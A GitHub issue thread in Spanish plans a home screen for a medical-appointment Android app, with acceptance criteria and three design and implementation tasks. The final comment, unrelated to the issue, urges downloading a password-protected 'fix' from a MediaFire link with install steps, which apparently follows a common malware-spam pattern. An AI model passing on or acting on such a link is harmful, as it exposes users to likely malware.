### ISSUE TITLE
#US01 - Pantalla de Inicio

### ISSUE THREAD

**Issue by MaldonF** [ReservasMedicasMobile/ReservasMedicasMobile#8]
Como usuario quiero visualizar una pantalla de inicio en la aplicación móvil con información del sistema para familiarizarme con su uso.

###Criterios de aceptación:

La activity debe cargarse correctamente cuando el usuario abra la App y debe mostrar información básica.
El diseño debe ser claro, fácil de entender y debe verse correctamente en dispositivos de varios tamaños.
La experiencia de usuario debe ajustarse a los estándares estipulados.
###Tareas:
- [ ] [#TK01: Diseñar la Pantalla de Inicio](https://github.com/ReservasMedicasMobile/ReservasMedicasMobile/issues/10)
- [ ] [#TK02: Implementar la Pantalla de Inicio en Android Studio](https://github.com/ReservasMedicasMobile/ReservasMedicasMobile/issues/11)
- [ ] [#TK03: Implementar el sistema de Branding](https://github.com/ReservasMedicasMobile/ReservasMedicasMobile/issues/12)

**Comment by MaldonF** [comment]
# TK01: Diseñar la Pantalla de Inicio.Crear el diseño visual de la pantalla de inicio utilizando herramientas de diseño gráfico o prototipado, considerando la experiencia del usuario en dispositivos móviles.

#TK02: Implementar la Pantalla de Inicio en Android Studio.Utilizar XML para definir el layout y Java para programar la lógica necesaria. Esta tarea incluye la creación de una activity que mostrará la información del sistema en la pantalla de inicio de la aplicación mobile.
#TK03: Implementar el sistema de Branding utilizado previamente en la aplicación web, con sus respectivos patrones de diseño.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
